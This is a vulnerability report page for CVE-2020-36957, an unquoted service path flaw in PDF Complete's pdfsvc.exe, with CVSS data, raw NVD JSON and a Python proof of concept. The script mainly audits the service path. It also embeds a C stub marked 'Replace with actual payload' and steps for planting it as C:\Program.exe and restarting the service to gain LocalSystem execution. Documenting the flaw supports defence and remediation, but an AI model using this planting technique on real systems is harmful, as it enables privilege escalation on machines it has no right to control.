Security Vulnerability Report
CVE-2020-36957 CVSS 7.8 HIGH

CVE-2020-36957

Published: 2026-01-26 18:16:26
Last Modified: 2026-04-15 00:35:42

Description

PDF Complete 3.5.310.2002 contains an unquoted service path vulnerability in its pdfsvc.exe service configuration. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PDF Complete < 3.5.310.2002
PDF Complete 3.5.310.2002

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
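#!/usr/bin/env python3
# CVE-2020-36957 PoC - PDF Complete Unquoted Service Path
# This script demonstrates the unquoted service path vulnerability in pdfsvc.exe
#
# Review notes:
#   * An unquoted service path (CWE-428) is only ambiguous when the path to the
#     executable contains whitespace; the check below tests for both conditions.
#   * Remediation is to enclose the service's binary path in double quotes in
#     its service configuration and to keep the parent directories writable
#     only by administrators.

import os
import sys
import subprocess
import ctypes


def is_admin():
    """Return True when the current process holds administrator rights.

    Returns False when the Windows shell API is unavailable (for example on a
    non-Windows host, where ``ctypes.windll`` does not exist).
    """
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        # AttributeError: no ctypes.windll on this platform.
        # OSError: the shell32 call itself failed.
        return False


def extract_binary_path(sc_output):
    """Return the BINARY_PATH_NAME value from ``sc qc`` output, or None.

    Only the line carrying the field is inspected; the text after the first
    colon following the field name is returned with surrounding whitespace
    removed.
    """
    for line in sc_output.splitlines():
        if 'BINARY_PATH_NAME' in line:
            remainder = line.split('BINARY_PATH_NAME', 1)[1]
            return remainder.partition(':')[2].strip()
    return None


def is_unquoted_path_with_spaces(binary_path):
    """Return True when *binary_path* is unquoted and its executable part has a space.

    A value that starts with a double quote is treated as quoted. Arguments
    after the executable are ignored, so a quoted argument does not hide an
    unquoted executable path and an argument separator is not mistaken for a
    space inside the path.
    """
    path = binary_path.strip()
    if not path or path.startswith('"'):
        return False
    exe_end = path.lower().find('.exe')
    # Without an ".exe" marker the whole value is examined; that may flag a
    # path whose only spaces are argument separators, which is the safer
    # direction for an audit.
    executable = path if exe_end == -1 else path[:exe_end + len('.exe')]
    return ' ' in executable


def check_service_path():
    """Check if pdfsvc.exe service has an unquoted path containing spaces.

    Runs ``sc qc pdfsvc`` (a read-only query) and inspects the reported
    BINARY_PATH_NAME. Returns True only when the path is both unquoted and
    contains whitespace; returns False when the service is absent, the query
    fails, or the path is not ambiguous.
    """
    try:
        result = subprocess.run(
            ['sc', 'qc', 'pdfsvc'],
            capture_output=True,
            text=True
        )
    except (OSError, ValueError) as e:
        # OSError covers a missing `sc` binary; ValueError covers undecodable output.
        print(f"[-] Error checking service: {e}")
        return False

    binary_path = extract_binary_path(result.stdout)
    if binary_path is None:
        print("[-] Service pdfsvc not found")
        return False

    print("[+] Service pdfsvc found")
    if is_unquoted_path_with_spaces(binary_path):
        print("[!] Service path is unquoted - Vulnerable!")
        return True
    print("[-] Service path is quoted or contains no spaces - Not vulnerable")
    return False


def exploit():
    """Run the service-path check and print the page's demonstration notes.

    Despite its name, this function writes nothing to disk and compiles
    nothing: it gates on ``is_admin()``, calls ``check_service_path()``, and
    prints two messages. Returns True only when the check reports an exposed
    service path.

    NOTE(review): the CVSS vector published for this CVE lists PR:L, so the
    administrator gate below is this script's own choice and not a property
    of the weakness; the ``sc qc`` query itself is read-only.
    """
    if not is_admin():
        print("[-] This exploit requires administrator privileges")
        return False

    if not check_service_path():
        return False

    # Illustrative C stub. As written it only runs `whoami` and redirects the
    # output to a marker file; it is not a reverse shell. The string is never
    # formatted, written to disk or compiled by this script.
    malicious_code = '''
#include <windows.h>
#include <stdio.h>

int main() {{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    // Replace with actual payload
    char* cmd = "cmd.exe /c whoami > C:\\\\poc_result.txt";
    CreateProcess(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
    return 0;
}}
'''

    print("[+] Payload generated - Compile and place as C:\\Program.exe")
    print("[+] Then restart the pdfsvc service to trigger execution")
    return True


if __name__ == "__main__":
    exploit()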

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36957", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.490", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDF Complete 3.5.310.2002 contains an unquoted service path vulnerability in its pdfsvc.exe service configuration. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges."}, {"lang": "es", "value": "PDF Complete 3.5.310.2002 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio pdfsvc.exe. Los atacantes pueden explotar la ruta sin comillas para inyectar y ejecutar código malicioso con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://pdf-complete.informer.com/3.5/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49226", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/pdf-complete-pdfsvcexe-unquoted-service-path", "source": "[email protected]"}]}}